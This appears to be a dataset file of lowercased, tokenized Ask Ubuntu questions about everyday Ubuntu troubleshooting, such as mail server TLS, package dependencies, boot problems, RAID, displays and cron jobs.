488280	kernel upgrade - now postfix starttl `` 502 command not implemented ''	interesting issue . so i rebooted one of my servers to upgrade the kernel . it came back online ( after having to reconfigure the network interfaces for some reason ) and postfix is no longer able to accept mail via starttls . root @ n2 : ~ # telnet example.com 25 trying 10.8.0.1 ... connected to 10.8.0.1 . escape character is '^ ] ' . 220 example.com esmtp postfix ( ubuntu ) > ehlo n2.example.com 250-example.com 250-size 10240000 250-vrfy 250-starttls 250-auth plain login 250-auth=plain login 250-enhancedstatuscodes 250 dsn > starttls 502 command not implemented i have changed nothing . i can send mail and receive mail . i can send mail with tls , but i can not accept mail with tls .
488281	cd rom update issue	i am having a problem with my cd rom not working or getting updates for it i went to the update manager and this is what i read when i went to settings . w : failed to fetch cdrom : //ubuntu 12.04.4 lts _precise pangolin_ - release i386 ( 20140204 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.4 lts _precise pangolin_ - release i386 ( 20140204 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . dose anyone know what this means ? thanks in advance .
488283	internet not working in ubuntu 14.04	i 'm using windows 8.1 with ubuntu 14.04 with uefi dual boot . i had to force shut down ubuntu after it hanged . since then internet is not working in ubuntu while everything is fine in windows . attaching the photos of outputs of some commands i ran to check things . looks like my router is connected to the laptop just fine . i ca n't understand where the problem lies since windows is n't having any . thanks in advance for your help . edit : some more outputs
488287	how do i run space engineers with windows version of steam ?	i am new to linux ( i installed it about 3 weeks ago ) and i am having a heck of a time trying to get space engineers ( a steam game ) to run . it is windows only , so i have been attempting to use wine . i know that wine works because starcraft ii runs very well on my machine . space engineers downloaded fine , but every time i run it , it shows a window saying it is installing .net 4.0 . the window then promptly disappears and nothing else happens . i have tried using the command 'winetricks dotnet40 ' , but it says that i need to switch the wineprefix to 32-bit . i have tried this many times and it creates a new directory and yet it seems to not ever use the new directory . i have spent a long time googling this issue and all i have found are the same set of instructions .
488292	dvd rw not detected/mount failed while boot	my fstab file ( /etc/fstab ) /etc/fstab : static file system information . use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . file system mount point type options dump pass / was on /dev/sda1 during installation uuid=49d9f938-c58a-4866-b993-56c2c9b42050 / ext4 errors=remount-ro 0 1 swap was on /dev/sda5 during installation uuid=5e5c9620-a701-473e-b7dc-6357c77988d2 none swap sw 0 0 /dev/disk/by-id/ata-matshitadvd-ram_uj8b1as_seb3811280 /mnt/ata-matshitadvd-ram_uj8b1as_seb3811280 auto nosuid , nodev , nofail , x-gvfs-show 0 0 do i need to change anything else ?
488297	ca n't boot ubuntu , i915 : exports duplicate symbol	i boot ubuntu and an error sometimes shows like this : [ 1.508191 ] i915 : exports duplicate symbol i915_release_power_well ( owned by i915_bdw ) and then it shows a blinking _ cursor . about a minute in i hear a high-pitched short blip from the motherboard speaker . update : once in a blue moon if i restart it , it will actually boot , but it gives me the same message and something about hda before i see my login screen .
488298	frome where to download ubuntu v10.10 for windows	i tried to download ubuntu 10.10 for windows but i cant download it.please suggest me any link to download ubuntu 10.10 .
488299	do n't see apache running in netstat	i 'm just playing with apache and i got it to work , that is i can connect to server by browsing to http : //127.0.0.1 and http : //192.168.1.5 i 'm not running ipv6 yet this is the result of netstat $ sudo service apache2 status * apache2 is running $ netstat -an | grep :80 tcp6 0 0 : ::80 : : : * listen $ wget 127.0.0.1 -- 2014-06-26 01:32:15 -- http : //127.0.0.1/ connecting to 127.0.0.1:80 ... connected . http request sent , awaiting response ... 200 ok length : 11510 ( 11k ) [ text/html ] saving to : ‘index.html’ 100 % [ ===================================================================================================== > ] 11,510 -- .-k/s in 0s 2014-06-26 01:32:15 ( 161 mb/s ) - ‘index.html’ saved [ 11510/11510 ] i was expecting to see it listening on a regular tcp which it clearly does ! ? edit : $ netstat -a | grep listen tcp 0 0 localhost : ipp * : * listen tcp 0 0 localhost : mysql * : * listen tcp6 0 0 ip6-localhost : ipp [ : : ] : * listen tcp6 0 0 [ : : ] : https [ : : ] : * listen tcp6 0 0 [ : : ] : http [ : : ] : * listen edit2 : why the down vote ? what am i missing can someone elaborate ?
488301	failed to install g++	i tried sudo apt-get install g++ but it ended with e : unable to correct problems , you have held broken packages . can anybody suggest the solution ?
488305	ca n't find my app in a dash , something is wrong with .desktop file ?	i created .desktop file : [ desktop entry ] name=sts version=1.0 type=application terminal=false exec=/root/springsource/sts-3.5.1.release/sts icon=spring_tool_suite.png actions=new ; [ desktop action new ] name=new instance exec=/root/springsource/sts-3.5.1.release/sts & i put it to /home/max/.local/share/applications but i ca n't find it in a dash ( windows key - > `` sts '' - name of an app ) . an application is launched fine from terminal using sudo /root/springsource/sts-3.5.1.release/sts what is the problem ?
488307	how to stop erratic output in tty1~6 ?	whenever i try to log in and type my password , the console starts to output ^ @ every split second , and it makes my entry invalid . i do n't know why this happens , sometimes it `` fixes itself '' so i can log in successfully . any help ?
488308	extract error which is about installing pear email packages on ubuntu 14.04	i want to send e-mail with smtp send function in php . so that 覺 should install pear email packages.but when i install these packages on terminal i get an error.the error is about extracting .tar.gz file.the tar.gz file is n't extracted.for example 覺 entered `` sudo pear install mail '' on terminal . the error is occurred as below . could not extract the package.xml file from `` /tmp/pear/install/mail-1.2.0.tgz '' download of `` pear/mail '' succeeded , but it is not a valid package archive error : can not download `` pear/mail '' download failed install failed and then 覺 entered `` sudo pear install mail_mime '' on terminal . again same error is occurred as below . downloading mail_mime-1.8.9.tgz ... starting to download mail_mime-1.8.9.tgz ( 33,796 bytes ) ... ... ... done : 33,796 bytes could not extract the package.xml file from `` /tmp/pear/install/mail_mime-1.8.9.tgz '' download of `` pear/mail_mime '' succeeded , but it is not a valid package archive error : can not download `` pear/mail_mime '' download failed install failed $ mail = @ $ smtp- > send ( .. , .. , .. ) ; function does n't work . so that mail is n't sended.this send ( ) function worked with 1.9.4 version of pear , 5.3.10 version of php and ubuntu 12.04 . but it does n't work with 1.9.4 version of pear,5.5.9 php and ubuntu 14.04 . i added `` sendmail_path '' part to php.ini file.but again i could n't install pear mail packages on terminal .
488309	error in installing ncurses !	i am first time working on lfs 7.5. i stuck due to an error while installing package ncurses . please help . thanks in advance ! ! ! error when i make install /sbin/ldconfig.real : ca n't create temporary cache file /etc/ld.so.cache~ : permission denied make [ 1 ] : [ /tools/lib/libncursesw.so.5.9 ] error 1 ( ignored ) installing ../lib/libncursesw.a as /tools/lib/libncursesw.a /usr/bin/install -c -m 644 ../lib/libncursesw.a /tools/lib/libncursesw.a ranlib /tools/lib/libncursesw.a make [ 1 ] : leaving directory `/mnt/lfs/sources/ncurses-5.9/ncurses' cd progs & & make destdir= '' '' install make [ 1 ] : entering directory `/mnt/lfs/sources/ncurses-5.9/progs' gcc ../obj_s/tic.o ../obj_s/dump_entry.o ../obj_s/transform.o -i../progs -i . -dhave_config_h -d_gnu_source -d_file_offset_bits=64 -dndebug -i . -i../include -i/tools/include -o2 -- param max-inline-insns-single=1200 -fpic -l../lib -lncursesw -l../lib -lncursesw -o tic ../lib/libncursesw.so : undefined reference to `__poll_chk' collect2 : ld returned 1 exit status make [ 1 ] : *** [ tic ] error 1 make [ 1 ] : leaving directory `/mnt/lfs/sources/ncurses-5.9/progs' make : *** [ install ] error 2
488310	software raid 1 on ubuntu 14.04 desktop	i am trying to setup sofware raid 1 for my ubuntu desktop ( 14.04 ) unfortunately desktop installer no longer supports raid1 configuration . therefore i am trying to manually set this up . i followed this blog post with following changes : set root= ' ( md/0 ) ' added insmod mdraid1x instead of raid i do not have separate boot partition ( /dev/md0 is set to / ) when i try to boot using /dev/md0 , i am dropped to busybox shell with following error : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init i ran cat /proc/mdstat in initramfs which shows all three devices are active . mount /dev/md0 /root works fine and i can see the filesystem mounted . i found following in dmesg : md : bind < sdb6 > md0 : unknown partition table i am really stuck with this and trying to find solution since couple of days . any help would be really appreciated .
488311	how can i install ubuntu server 12.04 lst to pc engine apu ( embedded system )	i have pc engines alix apu ( embedded system ) .i wanted to install ubuntu server to apu . apu : • cpu : amd g series t40e , 1 ghz dual bobcat core with 64 bit support , 32k data + 32k instruction + 512k l2 cache per core • dram : 4 gb ddr3 • storage : 16 gb msata • connectivity : 3 gigabit ethernet channels ( realtek rtl8111e ) i tried to install . i downloaded ubuntu-14.04-server-amd64.iso then i used unetbootin-windows-585 to create a liveusb stick and modified ​isolunux.cfg , txt.cfg and syslinux.cfg ​ isolinux.cfg : # d-i config version 2.0 console 0 serial 0 115200 0 include menu.cfg default vesamenu.c32 prompt 0 timeout 0 txt.cfg : default install label install menu label ^install ubuntu server kernel /install/vmlinuz append file=/cdrom/preseed/ubuntu-server.seed vga=788 initrd=/install/initrd.gz -- console=ttys0,115200n8 quiet – syslinux.cfg : # d-i config version 2.0 console 0 serial 0 115200 0 default menu.c32 prompt 0 menu title unetbootin timeout 100 label unetbootindefault kernel /install/netboot/ubuntu-installer/amd64/linux append initrd=/install/netboot/ubuntu-installer/amd64/initrd.gz tasks=standard pkgsel/language-pack-patterns= pkgsel/install-language-support=false vga=788 -- console=ttys0,115200n8 -- quiet i installed ubuntu server and everything was ok. after reboot , the machine freeze here : booting from hard disk ... booting from 0000:7c00
488314	error while using command line command to load firefox in lubuntu 14.04	i have tried to load firefox using command line command in lubuntu 14.04 . firefox is loading , but not loading as expected . ( used -fullscreen ) firefox -fullscreen when i execute the command am also getting the below error ( process:7411 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed please help to load firefox in fullscreen mode from command line .
488315	authentication with admin password problem	i have read quite a few of the answers to password problems but am completely new to ubuntu and ca n't figure this out . i bought my computer ( a dell vostro ) a few days ago , and i was trying to install some apps and it asks for an authentication code . i got as far as to check user account ( only one , admin ) and it does n't seem to have a password . i read a thread about setting a password but i do n't know what `` windows key '' or `` terminal '' are , so could someone please explain this ?
488316	script skipping user input in nested case statement	i am trying to create a nested case statement in which user input is expected ( y/n ) . however , the system never waits for the input and always goes to the third option , `` please answer yes or no '' . can anyone tell me what i am missing ? here is the case statement # ! /bin/bash status=status find /etc/init.d/* -name '* ' -print0 | while ifs= read -r -d '' file ; do if [ `` $ file '' ! = `` . '' -o `` $ file '' ! = `` .. '' ] ; then output= $ ( $ file $ status ) case `` $ output '' in *disabled* ) echo `` do you wish to start $ file ? '' read yn case $ yn in [ yy ] | [ yy ] [ ee ] [ ss ] ) $ file start ; ; [ nn ] | [ n|n ] [ o|o ] ) ; ; * ) echo `` please answer yes or no . `` ; ; esac ; ; * ) echo `` app $ file is running '' ; ; esac fi done running under ubuntu 14.04 lts sample output app /etc/init.d/reboot is running app /etc/init.d/resolvconf is running app /etc/init.d/rsync is running app /etc/init.d/rsyslog is running app /etc/init.d/samba is running app /etc/init.d/samba-ad-dc is running do you wish to start /etc/init.d/saned ? please answer yes or no .
488319	packages are not installling on ubuntu 12.04	i tried to install imagemagick using following command sudo apt-get install imagemagick -- fix-missing but while installing i get following error nginx-full : depends : nginx-common ( = 1.4.7-1+precise0 ) but 1.6.0-1+precise0 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried to remove the nginx using sudo apt-get remove nginx command but getting same error how can i resolve this issue . edit by referring this link output ofdpkg -l | grep nginx iu nginx 1.4.7-1+precise0 small , powerful , scalable web/proxy server ii nginx-common 1.6.0-1+precise0 small , powerful , scalable web/proxy server - common files if nginx-full 1.4.7-1+precise0 nginx web/proxy server ( standard version ) output of dpkg -s $ ( which nginx ) dpkg-query : error : -- search needs at least one file name pattern argument use -- help for help about querying packages . thanks in advance .
488321	stuck to login loop	i am an ubuntu newbie and have been using ubuntu 14.04 for the last 2 months . the problem is that i recently run the following commands on my terminal and have been stuck to login loop since.the commands are as follows : echo `` clean up '' & & , sudo apt-get -f install & & , sudo apt-get autoremove & & , sudo apt-get -y autoclean & & , sudo apt-get -y clean , please help since i ca n't log onto my desktop .
488324	redirect an output to a file from command piping grep	i am running this : cat /dev/urandom|hexdump| grep -i `` ffff f '' > random and i get nothing in file random , it remains zero length after the command is interrupted . how to make it writing output to a file ? i need to write a result to a file , which should contains output data like this : 021bc40 7724 d4f5 59ec bcbb ffff fd26 ab3c 9b7c 03a9100 b3a5 8601 fa33 ffff f23c 4326 2e7f 0c8a 0449810 e459 d5af 4e11 ffff fc55 8660 9efb 3c9b
488325	problem with external monitor	since yesterday i have weired problems using my external monitor ( benq 19 '' connected via dvi over dvi- > hdmi cable and hdmi- > mini displayport-adapter ) with ubuntu 14.04 . until then i could use this monitor w/o problems . i did quite some research but could not really find a solution there are two scenarios of this problem : when i connect the monitor to my laptop ( dell xps 13 3 . gen ) while beeing logged into unity the monitor is detected and tried to connect to as screen extension . but the screen does stay black and the screen of my laptop starts to stutter . the led an the external monitor indicates a signal . after a while a picture appears on the monitor and unity freezes . the monitor is already connected when powering on the laptop lightdm comes up in dual screen mode and emediatly freezes . even after restarting lightdm from the terminal it again freezes right after startup . using my hdtv everything works fine ! i found several bugs fitting my problem but these are quite old and there are no solutions . my issue seems to be duplicate of https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/964231 . i did not yet try the workaround . what i have done so far : deleted ~/.config/monitors.xml = > no result checked modes using xrandr = > wrong refresh rate seems to used for monitor set different refresh rate using xrandr to 60hz while enabling it in system settings = > monitor shows picture correctly and things work fine until suspend/hibernat/logoff/reboot i tried to check the update history to see if there have been any relevant updates but synaptic does only show updates until 19th of june . i think i updated the system recently using the update manager . does anybody have similar problems or can even provide a solution ? thanks !
488327	making a live cd of my ubuntu install	i want to make a cd of current ubuntu install . i wan na make a live cd/dvd that , when installed , install my custom system , while allowing the user to enter their details like password , use name , and time format . it should be easy using the oem installer , but i wan na distribute the iso . can anyone tell me how to do that . ( i would prefer a gui tool rather than command line . thanks
488328	how to get appropriate lib package name for a specific header file	it 's common problem that we get some error like `` abc.h no such file '' when compile source . only way to find the solution ( as i know ) is search in internet . what i need to do , compile the source , it will give me some errors and then i have to install the dev by searching in internet . is there any way that i can get lib package name by the header file name ? assume i need crypto.h file , libssl-dev contains this file . but how could i know ? where should i search for it ? is there any reference site or program ?
488329	diagnostic large boot-times	i consistently have extra-large boot-times ( but sucessful boot everytime nevertheless ) . i initially had short boot-times following a fresh install of trusty 14.04 lts ( no upgrade path ) on an hp 8510w . that means : 52s to 1min26s ( 52 '' -1'26 '' ) before i get to sign into my session and a whopping 1'37 '' - 2'36 '' before i see unity appear . all times are counted from the moment i select ubuntu in the grub2 menu . i uploaded my bootchart on https : //wiki.ubuntu.com/bootcharting and it is available here . systemd-udevd looms big as it extends over the whole chart width , practically all 1'26 '' of it . running 'dmesg ' after boot from the gui , gives me real-time info and therefore no boot-time info . anyway , its most salient content is about ufw auditing the system ports or reiterating allow rules but first and foremost about : [ ] usb 2-1.3 : reset full-speed usb device number 27 using ehci-pci repeated many times ... until [ ] usb 2-1.3 : usb disconnect , device number 27 [ ] usblp0 : removed [ ] usb 2-1.3 : new full-speed usb device number 28 using ehci-pci and so on until `` usb device number 54 '' question : is there an optimization path and are there diagnostic tools i could use to narrow the probable cause ( s ) of the slow boot process down to something more explicit than what my bootchart spews out ?
488341	failure linking 32bit app using libexpat on ubuntu 14.04 64bit	i 'm trying to build the i386 version of the fontconfig packages , and the configure script fails to find the expat library , which is installed for both architectures . the failing test app build command : > gcc-4.8 -m32 -o conftest expat.test.c -lexpat /usr/bin/ld : can not find -lexpat collect2 : error : ld returned 1 exit status exit 1 ldd : ./conftest : no such file or directory yet when i pass in the library 's full path instead of -lexpat , the command succeeds : > gcc-4.8 -m32 -o conftest expat.test.c /lib/i386-linux-gnu/libexpat.so.1 ; ldd conftest linux-gate.so.1 = > ( 0xf7759000 ) libexpat.so.1 = > /lib/i386-linux-gnu/libexpat.so.1 ( 0xf76f8000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf7549000 ) /lib/ld-linux.so.2 ( 0xf775a000 ) the lib32gcc-4.8-dev package is installed . could this be related to the fact that i had to make manual i686-linux-gnu-objcopy and ditto-strip symlinks to /usr/bin/ { objcopy , strip } and was also missing an i686-linux-gnu-gcc command ?
488343	how to store network-manager settings in home	i 'm using ubuntu 14.04 with the network-manager . it stores all information about wireless networks , vpns , ... in /etc/networkmanager/system-connections and i was just wondering why ... i thought the home folder of each user should contain all configuration files , especially those with security-relevant information . i 'm using an encrypted home directory and want this information to be encrypted , too . is there any other directory ( in the home folder ) where the network-manager reads configuration files from ( after login ! )
488345	using mac-style ( option+u ) umlaut compositon with ibus	i am using the ibus input method to alternate between us-english ( my actual keyboard layout ) and googlepinyin . however , occasionally i need to write german umlauts as well ( ß , ä , ü , ö ) . there is the compose-key sequence that i just used to type the sample umlauts , which works , but i find it rather inconvenient . is there a way to configure for apple-stype umlaut generation ( on my mac : option+u , release , then the character you want as umlaut , e.g . option+u , release , a -- > ä ) ? i find this more convenient . of course i could just add a german keyboard layout to switch to , but that i would also find rather inconvenient . i gooled extensively , and i found some pointers on how to make this work in general , but none those methods seem to work with ibus . any ideas ? thanks a bunch ! jan
488346	installed 14.04 ubuntu desktop ..want to upgrade kernel	whenever i boot into this os , im encountering lot of bugs which are making the system unstable and stop functioning . i have frequently found this error bug soft lockup - cpu # 0 stuck for 22s [ chrome:2566 ] after this error pops .. system simply freezes . googled a lot to solve this problem , one of the fix being upgrading the kernel . to do this first i checked my current kernel version $ uname -a linux vikram-vostro1310 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux so my current version is 3.13.0-24 , how do i upgrade to latest 'stable ' kernel , does upgrading to kernel 3.14.1 solve all these problems as stated in this link ? is there a better 'stable ' kernel which avoids the above bugs or should i just go forward and upgrade to 3.14.1 kernel as instructed in this link kindly help me out , thanks in advance .
488350	how to prompt users with a gui dialog box to choose file/directory path , via the command-line ?	suppose for example i have script like this : ( the example depicts an rysnc use case ) # ! /bin/bash echo -n `` enter source directory : '' read srcdir echo -n `` enter destination directory : '' read dstdir rsync -av -- delete `` $ srcdir '' `` $ dstdir '' the idea here is to prompt the user to enter the `` source '' and `` destination '' directories for rsync to work with . as is , the user will have to manually enter /path/to/directory/ via the command-line . instead , i want to prompt the user to enter the paths through a gui interface . something like this : what commands can i use to prompt the user with a gui selection window that returns the file path to the command-line ? because if scripted file run directly ( by double-click and not run in terminal ) then i want to provide gui selection window .
488356	how can i start a script in a minimised gnome terminal ?	i can start a command in a new gnome terminal as follows : nohup gnome-terminal -- window-with-profile=background -- command ls > /dev/null 2 > & 1 & ( based on http : //askubuntu.com/a/46630/7146 and http : //stackoverflow.com/a/10708326/236081 ) however , i want the new terminal window to start minimised in the launcher . how can i do that ?
488358	screenshot ( ctrl + shift + prtscn ) not in clipboard	ctrl + shift + prtscn has suddenly stopped working . i 'm still able to select an area , but the image is never copied to the clipboard . i 'm running ubuntu 14.04 .
488360	i broke software updater by making python3 default	i tried to make python 3 the default python version by running : sudo update-alternatives -- install /usr/bin/python python /usr/bin/python3 10 this broke python 2 programs , so i tried reversing the process and finally i tried : sudo update-alternatives -- install /usr/bin/python python2.7 /usr/bin/python2.7 10 which made python2.7 the default python version but software updater does n't run and running aptdcon in a terminal gives : bash : /usr/bin/aptdcon : /usr/bin/python3 : bad interpreter : no such file or directory i tried reinstalling python 3 but got : errors were encountered while processing : /var/cache/apt/archives/python3_3.4.0-0ubuntu2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i revert this mess ?
488362	ubuntu 14.04 & remote desktop	till now i 'm working with ubuntu 12.04 on a standalone pc ( no display , mouse , keyboard ) . i installed xrdp and i 'm using windows remote desktop connection . it 's working fine with juste one adjustment : put that in the .xsession gnome-session -- session=ubuntu-2d this morning i tried installing ubuntu 14.04 , xrdp , .xsession adjustment and ... no working anymore . only a grey screen with a x mouse cursor . after lot of search and reading on internet it seems it 's not more possible to use ubuntu-2d with 14.04 . only xfce is working . but i do n't want to use xfce ! so what 's the solution ? xrdp with windows remote connection : works only with xfce teamviewer : it 's working but everything i do is visible on the server ( if a screen is connected ) and the session remains open if i do not logout before i quit teamviewer client ( so someone can connect a keyboard to the server and use it ) x2go : seems not working fine with 14.04 desktop sharing : not working . i 'm using ultravnc and i got no security type suitable for rfb 3.3 supported ... ? it 's so easy with windows ... the only thing i want is to connect to my server , open a remote session and work . is it impossible mission ?
488364	wireless connection speed issue ( belkin f9l1101v2 )	i have a usb wireless adapter , which is a belkin n600db ( f9l1101v2 ) . this adpater was not supported by ubuntu originally . so i followed the suggestions by 'wildman ' and managed to make it work on my machine . i am running ubuntu 14.04 lts . the only imperfection ( well , nothing is perfect ... ) i have right now is , the wireless card can only connect to my router in 54 mb/s speed . this same adapter can connect to the same router in 300 mb/s in windows 7 . due to the connection speed , the download speed and upload speed is also much slower . i do n't know if this is a driver issue or a configuration issue . any help is appreciated . thanks !
488365	additional folder icons	does anyone know of any additional folder icons , in the default style with additional images upon them , to use in ubuntu ? i would like to customise some of those i have created in my home folder but do n't want to deviate from the standard theme . i also do n't want to spend hours making new icons myself if someone else has already gone along that path .
488373	end key is not working	i have ubuntu 12.04 . my end key on keyboard is not working . i have tried sudo dpkg-reconfigure keyboard-configuration but no avail . it is frustrating coz i am habitual with end key in my typing . please help ! ! ! thank you
488378	accents in no english languages ( greek , spanish ... ) in ubuntu 14.04 and wine ( or similar ) ( e.g . msoffice )	i have installed ubuntu 14.04 and in this version i have a problem . it is that when i write a vocal with accent ( e.g . a + ´ = á ) nothing is written . nothing is nothing ( no a without accent or ´a ) i have report this error in codewaeavers ( crossover ) : hello i 'm using crossover 12.5.1 and ubuntu 14.04 , and i have installed msoffice 2010 . when i write accents ( e.g . é ) nothing is written in the text . nothing is nothing ( e + ' = no string ) . i used crossover in ubuntu 13.10 and i did n't have problems . but in this versions , ( in two different ubuntu installations ) i have it . which can be the problem ? thanks edit : my last attempt has been with a empty ubuntu and i have seen other persons with the same problem link does anybody knows a solution or if is the problem being solved ? thanks
488379	spamassassin does not honour local.cf	i updated my /etc/spamassassin/local.cf spamassassin file to update some score rules . however , even after restarting spamassassin ( via service ) , the new score are not shown in spam emails . in fact , nothing in that file seem to influence how spamassassin work . i use exim as my mta but that should not matter . all packages were installed via apt-get and are at the latest version for 14.04 . for example , i have this : score html_message 2.0 define in /etc/spamassassin/local.cf . i restarted both exim and spamassassin . then got yet another spam with this : 0.0 html_message body : html included in message in the x-spam-report field . what is going on ?
488382	why pipes are used instead of input redirection	i 'm new to linux systems and i ca n't really understand why wee need two operators that can redirect output : pipe as | and ouput redirection operator > ? ca n't we just always use the second ? most of the times i see that the pipe is used if multiple commands are chained together . if however , the output is redirected to file , as in echo 'hello ' > filename , the output redirection operator is used . what am i missing here ?
488383	i have installed ubuntu 14.04 but unable to update or install any third party software	i have installed ubuntu 14.04 but unable to update or install any third party software . even i am trying to install video codec for video file but not working . please see below : root @ samiul-inspiron-n5010 : /home/samiul # sudo apt-get install libavcodec- extra-53 libavcodec53 ffmpeg reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libavcodec-extra-53 e : unable to locate package libavcodec53 e : unable to locate package ffmpeg i am getting this error
488387	error while make file-5.17	i am installing file-5.17 library . but it gives me error while make . my terminal window shows this error ... make all-recursive make [ 1 ] : entering directory `/mnt/lfs/sources/file-5.17' making all in src make [ 2 ] : entering directory `/mnt/lfs/sources/file-5.17/src' make all-am make [ 3 ] : entering directory `/mnt/lfs/sources/file-5.17/src' make [ 3 ] : nothing to be done for `all-am ' . make [ 3 ] : leaving directory `/mnt/lfs/sources/file-5.17/src' make [ 2 ] : leaving directory `/mnt/lfs/sources/file-5.17/src' making all in magic make [ 2 ] : entering directory `/mnt/lfs/sources/file-5.17/magic' ../src/file -c -m magic make [ 2 ] : *** [ magic.mgc ] segmentation fault ( core dumped ) make [ 2 ] : leaving directory `/mnt/lfs/sources/file-5.17/magic' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/mnt/lfs/sources/file-5.17' make : *** [ all ] error 2 thanks in advance ! ! ! ! ! !
488389	how to install drivers for canon ir3570/ir4570 printer in 12.04	i need a guide for installing canon ir3570/ir4570 drivers on ubuntu 12.04 x64 . i will appreciate it if you send me a video or picture prove for the guide . the printer is shared from a windows pc
488391	avconv pipe to v4l2loopback device	i use v4l2loopback module to create two video device . my intention is to pipe output from primary video device to these two virtual devices . i can do that using ffmpeg : ffmpeg -f video4linux2 -s 640x480 -r 5 -i /dev/video0 -codec copy -f v4l2 /dev/video2 -codec copy -f v4l2 /dev/video3 but i want to do that using avconv . i try'it as output v4l2 format and video4linux2 but nothing work . i know avconv is very similar to ffmpeg , but do not know how to accomplish what i want using avconv .
488393	crontab not run job and change job	i 've set 'crontab ' with root user and -e key but cron is not running my jobs and after little time , my job is removed and replaced with other text ! ! ! ! the jobs set : # m h dom mon dow command @ reboot noip2 # agape 5 2 * * * aria2c -c -x16 -s16 -t120 -j2 -k 1m -i `` /home/downloadlink.txt '' -d `` /home/download/ '' -l /home/arialog/`date '+\ % y\ % m\ % d'`.log -- log-level=notice 55 6 * * * pkill aria2c in syslog , cron says run noip2 but not run this
488396	maas/juju not cleaning up nodes	i 've been playing with maas and juju ( using 14.04 lts ) for the first time and have a single node in my cluster which pxe boots fine via wol when i do a juju bootstrap . i 'm having an issue where after destroying the juju environment , bootstrapping it again errors out because the juju-db service is still running on that node . the node reverts from allocated to ready within maas once the environment is destroyed , but needs a manual reboot before a subsequent bootstrap can take place . there are no entries in maas.log following the destroy . it does n't feel right to have to do this - surely maas should power down the node down once juju has finished with it ? or at the very least juju should properly clean up after itself during the destroy ? or am i missing something here ?
488397	how fix the issue that so that ubi-usersetup crash does n't happen when i try to install ubuntu	whenever i try to install ubuntu 14.04 lts i get a message saying : ubi-usersetupcrash ubi-usersetup failed with exit code 10 . further information may be found in var/log/syslog what do i do so i can install ubuntu without it crashing ?
488399	locale error when doing sudo operations	when i do some super user operations , like upgrading the system , i get these warnings : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_paper = `` de_de.utf-8 '' , lc_address = `` de_de.utf-8 '' , lc_monetary = `` de_de.utf-8 '' , lc_numeric = `` de_de.utf-8 '' , lc_telephone = `` de_de.utf-8 '' , lc_identification = `` de_de.utf-8 '' , lc_measurement = `` de_de.utf-8 '' , lc_time = `` de_de.utf-8 '' , lc_name = `` de_de.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . do you know how can i get rid of it ? i want the system in en_us
488402	touchpad disabled after resume when previously using usb mouse	after upgrading from xubuntu 13.10 to 14.04 my touchpad stopped working in certain circumstances . in work i use a usb mouse , in the evening i undock my dell latitude and close the lid to suspend to ram . when i get home and resume , my touchpad no longer works . the mouse pointer appears frozen in place . as an experiment i brought home my usb mouse one day , and this still worked . it appears that for some reason my touchpad is disabled after a resume . how do i get my touchpad to work without restarting x ?
488404	how to increase storage memory in my system ( 14.04 ) ( installed alongside windows 7 ) ?	i have installed ubuntu 14.04 alongside windows 7 by selecting 30gb approximately . now i want to increase storage memory with out affecting both ubuntu and windows . i saw this question , but i ca n't find solution in there . when i do , arul @ arul-pc : ~ $ sudo fdisk -l i got response , disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x283091b8 device boot start end blocks id system /dev/sda1 2048 102606847 51302400 7 hpfs/ntfs/exfat /dev/sda2 * 102606848 307199999 102296576 7 hpfs/ntfs/exfat /dev/sda3 307204094 625139711 158967809 f w95 ext 'd ( lba ) /dev/sda5 307204096 389933567 41364736 7 hpfs/ntfs/exfat /dev/sda6 449028096 512002047 31486976 7 hpfs/ntfs/exfat /dev/sda7 512006144 625139711 56566784 7 hpfs/ntfs/exfat /dev/sda8 389935104 443273215 26669056 83 linux /dev/sda9 443275264 449015807 2870272 82 linux swap / solaris partition table entries are not in disk order please provide some solutions .
488410	bitnami mediawiki stack - autostart problem	i 'm pretty new to the unix world and am stuck on the following problem : i 've installed a bitnami mediawiki package onto my ubuntu system which includes an apache server , mysql , php and the mediawiki software . everything 's running fine but i 'm just not getting the servers to start automatically during booting . i 've followed this tutorial exactly : http : //wiki.bitnami.com/native_installers_quick_start_guide # how_to_start_automatically_the_stack_on_linux.3f ..but the service just wo n't start and i ca n't find anything in the logs in /var/log either . am i missing something ?
